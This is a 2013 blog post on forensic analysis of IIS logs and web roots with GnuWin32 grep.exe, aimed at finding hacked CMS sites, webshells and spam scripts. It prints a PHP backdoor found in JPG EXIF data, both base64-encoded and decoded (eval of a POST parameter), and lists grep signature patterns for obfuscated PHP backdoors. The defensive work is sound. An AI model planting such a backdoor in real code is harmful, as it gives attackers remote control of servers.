Grep for forensic log parsing and analysis on Windows Server IIS

How to use GnuWin32 ported tools like grep.exe and find.exe for forensic log file analysis in Windows Server.
Published on Tuesday, 9 April 2013

In this article I'll give some real live examples of using these ported GnuWin tools like grep.exe for logfile analysis on Windows servers. The article provides three example, as an alternative to LogParser, because finding spam scripts fast is often very important.


Forensic log parsing & analysis with grep

Find webshells and backdoors in websites, check visitor's IP addresses or hits to backdoor/webshell files in IIS log files easy. Command-line log analysis in Windows Server, search for Joomla-, WordPress-, Drupal- and PHP- malware & backdoors in your website with grep and find.

Recently Brad Kingsley wrote an excellent article titled "Using LogParser to Check Visitor IPs to a Certain Page".

Even though LogParser is a great tool for the job, I replied to that post that I'd rather use ported GnuWin tools, such as grep.exe, cut.exe, find.exe or - depending on the job - tail.exe for such easy tasks. Just because my fingers type grep.exe and cut.exe commands faster than SQL 🙂

Being able to find information fast on – for example – website abuse is very important for my abuse-desk job. Under certain circumstances using these tools simplifies your job, simply because you can't use recursion with LogParser (yes, you can use folder*.log, but not folde*\file.log). See below for an update.

  • example 1: Grep.exe Joomla x.htm
  • example 2: Grep for Joomla, WordPress, and Drupal backdoors
  • example 3: Spam mail sent from web server – web site

For the uninitiated, grep.exe is basically a command to find a string in a file or standard input. The result is printed to standard output and can also be piped into a file or second command. It supports counting of results, regular expressions (regex), extended regex, Perl regex, case insensitive, and so on.

With grep, you can also search recursive through many files, and doing so you can include only files which match a pattern. Quite handy :).

I may use "grep.exe" and "grep", in this article they are one and the same.

Just type grep.exe --help for a listing.

About LogParser

Log parser is a powerful, versatile tool that provides universal query access to text-based data such as log files, XML files and CSV files, as well as key data sources on the Windows operating system such as the Event Log, the Registry, the file system, and Active Directory

About GnuWin

GnuWin provides ports of tools with a GNU or similar open source license, to modern MS-Windows (Microsoft Windows 2000 / XP / 2003 / Vista / 2008 / 7)

I'm sure you're able to download and install these tools, this is not covered in this post. For easy usage, place the files in your PATH environment variable.

Grep.exe Joomla x.htm – example 1

Recent Joomla com_jce attacks and defaces left behind a distinct file called x.htm. Since an already hacked site always leads to more abuse, it's important to find these defaced Joomla websites.

Suppose I want to search hundreds of logfiles on one web server for the string x.htm. In order to prevent false possibles as much as possible we need to exclude index.htm and index.html as a match. I want grep.exe to produce only a listing of log files with matches, and not to output all results.

To accomplish this we provide a list parameter.

c:\inetpub\logs>c:\bin\grep.exe -rl
   --include=nc1304.log "/x.htm" *

In this command we use -r for recursive, -l for list* and --include to search only through files which match the given pattern.

The result may be:

W3SVC001/nc1304.log
W3SVC002/nc1304.log
W3SVC095/nc1304.log
W3SVC586/nc1304.log
...
...

If we execute the same command without listing, the results are printed to the screen:

W3SVC002/nc1304.log:a.bb.cc.ddd - - [09/Apr/2013:08:47:58 +0200]
 "GET /x.htm HTTP/1.1" 200 3709
W3SVC095/nc1304.log:a.bb.cc.ddd - - [09/Apr/2013:20:09:04 +0200]
 "GET /x.htm HTTP/1.1" 404 1830
W3SVC095/nc1304.log:a.bb.cc.ddd - - [09/Apr/2013:20:09:04 +0200]
 "GET /moblog/x.htm HTTP/1.1" 404 1795
W3SVC586/nc1304.log:aa.bbb.c.dd - - [09/Apr/2013:21:07:45 +0200]
 "GET /x.htm HTTP/1.1" 404 1795
W3SVC586/nc1304.log:aa.bbb.c.dd - - [09/Apr/2013:21:07:46 +0200]
 "GET /x.htm HTTP/1.1" 404 1795
W3SVC586/nc1304.log:aa.bbb.c.dd - - [09/Apr/2013:21:07:46 +0200]
 "GET /images/x.htm HTTP/1.1" 200 3709
W3SVC586/nc1304.log:dd.aaa.b.c - - [09/Apr/2013:21:10:29 +0200]
 "GET /x.htm HTTP/1.1" 404 1795
W3SVC586/nc1304.log:dd.aaa.b.c - - [09/Apr/2013:21:10:29 +0200]
 "GET /images/x.htm HTTP/1.1" 200 3709
...
...

For more on NCSA Common Log File Format, see the IIS 6.0 documentation.

In this view, we see that the websites with IIS identifiers 002 and 586 are probably hacked, since they return a 200 OK HTTP status code. Website ID 095 returns 404 Not Found as result, which is good. Other logfile formats, such as W3C Extended (IISW3C) have different fields and results (all on one line):

W3SVC762/u_ex1304.log:2013-04-12 16:23:47 xx.xx.xxx.xx GET /wordpress/x.htm - 80 - a.bb.cc.dd Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_7_1)+AppleWebKit/535.1+(KHTML,+like+Gecko)+Safari/535.1 - www.example.com 200 0 0 21849 178 904

Even though the HTTP return code is 200, this is still a false positive because of WordPress' behavior.

Grep for Joomla, WordPress, and Drupal backdoors – example 2

Backdoors come in a wide variety. In example 3 you see a .PHP-file with a random name, for mass mailing purposes. We find these all the time within hacked Joomla, WordPress and Drupal web sites. Not only mass mailing files, but also PHP backdoor shells (C99 shell, FilesMan shell, etc.). These backdoor shells give crackers constant access to the website.

We often also find modified files with iframes and/or viruses or newly uploaded files. Even images like .gif and .jpg are modified to contain backdoors! Sucuri wrote a blog post about malware hiding inside JPG EXIF headers. Something I've seen for the past weeks.

We can locate roughly about 99,9% of all infected files, and files modified with backdoors, with a single grep.exe command:

c:\inetpub\wwwroot>c:\bin\grep.exe -Er "(gzinfl|base64_d)" *

The -E option enables grep.exe's extended regular expression capabilities, -r is just a recursive search into directories. The pattern searches for everything containing "gzinf" or "base64_d". You'd probably guessed this stands for gzinflate() and base64_decode(). We can extend the search with strings like eval, iframe, and so on, but we don't want too many false positives in our result list.

Our result list might be:

Binary file administrator/components/com_hsconfig/presets/overlay/closeb​utton.jpg matches
Binary file administrator/components/com_hsconfig/presets/slideshow/gall​ery-in-box.jpg matches
Binary file images/carwash2.jpg matches
Binary file images/fader0.jpg matches
Binary file images/sn_2.jpg matches
Binary file images/stories/Flyer_achterkant.jpg matches
Binary file images/stories/fruit/pears.jpg matches
Binary file images/stories/thema_tanken_v2.jpg matches
Binary file images/stories/web_links.jpg matches
Binary file images/united3.jpg matches
Binary file modules/mod_rokajaxsearch/images/youtube.jpg matches

Sometimes you find the JPG files Sucuri writes about, it might contain:

/.*/e
 eval(
   base64_decode('
     aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZh​bChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30=
   ')
 );

Which decodes (translates) to:

$ echo aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMo​JF9QT1NUWyJ6ejEiXSkpO30= | base64 -d
if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}

Yup, we found a backdoor in a .JPG file.

More grep search commands

Other, often good grep seach commands are:

c:\bin\grep.exe -Erl "eval\((gzinfl|base64_d)" .

Extended regular expression, searches for eval(gzinflate or eval(base64_decode, and list matching files.

c:\bin\grep.exe -Erl "(gzinfl|base64_d)" .

Extended regular expression, searches for gzinflate or base64_decode, without eval and list matching files.

c:\bin\grep.exe -Er "eval\((\$_GET|\$_POST|\$_REQUEST)" .

This extended regular expression searches for eval($_GET or eval($_POST or eval($_REQUEST in files. This one can be simplified into:

c:\bin\grep.exe -Er "eval\(\$_(GET|POST|REQUEST)" .

Search only for $_GET or $_POST or $_REQUEST in all files with an extended regular expression:

c:\bin\grep.exe -Er "(\$_GET|\$_POST|\$_REQUEST)" .

Simplified:

c:\bin\grep.exe -Er "\$_(GET|POST|REQUEST)" .

Fgrep or grep -F

You've seen a lot of PHP backdoor obfuscation techniques and strings in this post. Instead of using them all separately from the command line, you can combine them into one file for usage with fgrep (or grep -F).

Fgrep is the same as grep -F. Interpret PATTERN as a list of fixed strings, separated by newlines, any of which is to be matched.

For example, create a txt file with the following contents:

eval($_REQUEST
eval($_GET
eval($_POST
$GLOBALS[
$strrev('edoced
base64_decode
$f53[
hacked
FilesMan
\x73\x74\x72\x5f

The following command will search recursively all files for these patterns, or strings: fgrep -rf patternFile.txt DIRECTORY > result-file.txt. Now you'll only have to inspect your result-file.txt for PHP backdoor signs.

Update 2015-01-09

nějakej PHP backdoor and other PHP backdoor variants

The – I believe it is called – "nějakej" PHP backdoor uses $f53[] array to store it's payload in $GLOBALS. It is easy to rename this to $f54, but haven't encountered that at the time of this writing (2015-01-09). So add \$f53 to your grep.exe search.

As time passes, and "malware" authors evolve (ahem...), they try to use as less obvious functions as possible. It is not uncommon to find functions like strrev('lave'); or strrev('edoced_46esab');. These are reversed representations of eval and base64_decode, to circumvent (semi) automatic scans like the once I described above. Always keep this in mind!

PHP Backdoor Obfuscation Techniques

A must read is Vexatious Tendencies‘s blog post PHP Backdoor Obfuscation Techniques for more information about how to obfuscate (or recognize) PHP backdoors.

Brad Duncan, security researcher at Rackspace, wrote an interesting article about the evolving javascript (malware) obfuscation. Exactly the kind of PHP backdoors you often find in web applications like WordPress, Joomla or Drupal. So stay informed on the latest obfuscation techniques.

Spam mail sent from web server – web site – example 3

Sometimes you open up your abuse Inbox and you find a complaint (or notification) containing the following email headers:

Received: from some-webserver.example.net (some-webserver.example.net
 [xx.xx.xxx.xx])
    by some-smtpserver.example.net (Postfix) with SMTP id 84B641B0D2A4
    for <jefff@servicemaster380.com>; Sat, 13 Apr 2013 09:22:19 +0200 (CEST)
Date: Sat, 13 Apr 2013 09:22:19 +0200
Subject: Your Order#681588745
To: jefff@servicemaster380.com
X-PHP-Originating-Script: 0:394c051af.php(6) : eval()'d code(2) :
 eval()'d code(4) : eval()'d code
From: "Airlines" <service-194@dallasconcerttickets.com>
X-Mailer: CF-XPInformer
Reply-To: "Airlines" <service-194@dallasconcerttickets.com>

Luckily PHP prints an X-header containing the name of the script, in this case 394c051af.php. This makes our search a whole lot easier! 🙂 Of course, we can use find.exe to find this particular file somewhere on the file system (c:\inetpub\www\root>find.exe -type f -name 394c051af.php -print), but this is very time consuming. Not to mention disk I/O load.

It's a lot faster to use grep.exe to find this string in HTTP log files. We use the almost same grep command parameters:

c:\inetpub\logs>c:\bin\grep.exe -rl
  --include=nc1304.log "394c051af.php" *

Chances are there is only one hit because of the uniqueness of the filename. If PHP didn't print the filename we'd have to make an educated guess based upon the timestamp in the e-mail headers in combination with HTTP POST verb. Something in the line of (W3C versus NCSA – searches in a timeframe of one minute):

c:\inetpub\logs>c:\bin\grep.exe -rl 
  --include=ex1304.log "2013-04-13 09:22:.*POST" *
c:\inetpub\logs>c:\bin\grep.exe -rl
  --include=nc1304.log "13/Apr/2013:09:22:.*POST" *

This'll most likely output multiple logfiles with hits to the query, and all need to be inspected for suspicious behavior.

LogParser, recurse through directories and logfiles

Update 2013-07-17: To recursive scan through directories, you can use FOR with DIR /S/B:

FOR /F %i IN ('DIR /S /B u_ex1307.log')
 DO @LogParser -i:w3c
  "SELECT COUNT(cs-method) AS nmb_get
   FROM %i
   WHERE date = '2013-07-05'
   AND time = '18:30'
   AND cs-method = 'GET'"

Finding Security Insights, Patterns, and Anomalies in Big Data

This article Using grep.exe for forensic log analysis on Windows Server and IIS is mentioned as a reference, in the book Information Security Analytics: Finding Security Insights, Patterns, and Anomalies in Big Data, written by By Mark Talabis, Robert S. McPherson, I Miyamoto, Jason Martin. Thanks! 🙂

Forensic analysis of web server logfiles – the conclusion

In this post I've shown you how to use open source, and free available, command line tools like grep.exe, find.exe, cut.exe, cat.exe and wc.exe to perform some basic forensic log analysis of web server log files. Further, this post gave you some insights in commonly used PHP obfuscation methods, to hide PHP malware, webshells and backdoors.

I hope you found this helpful.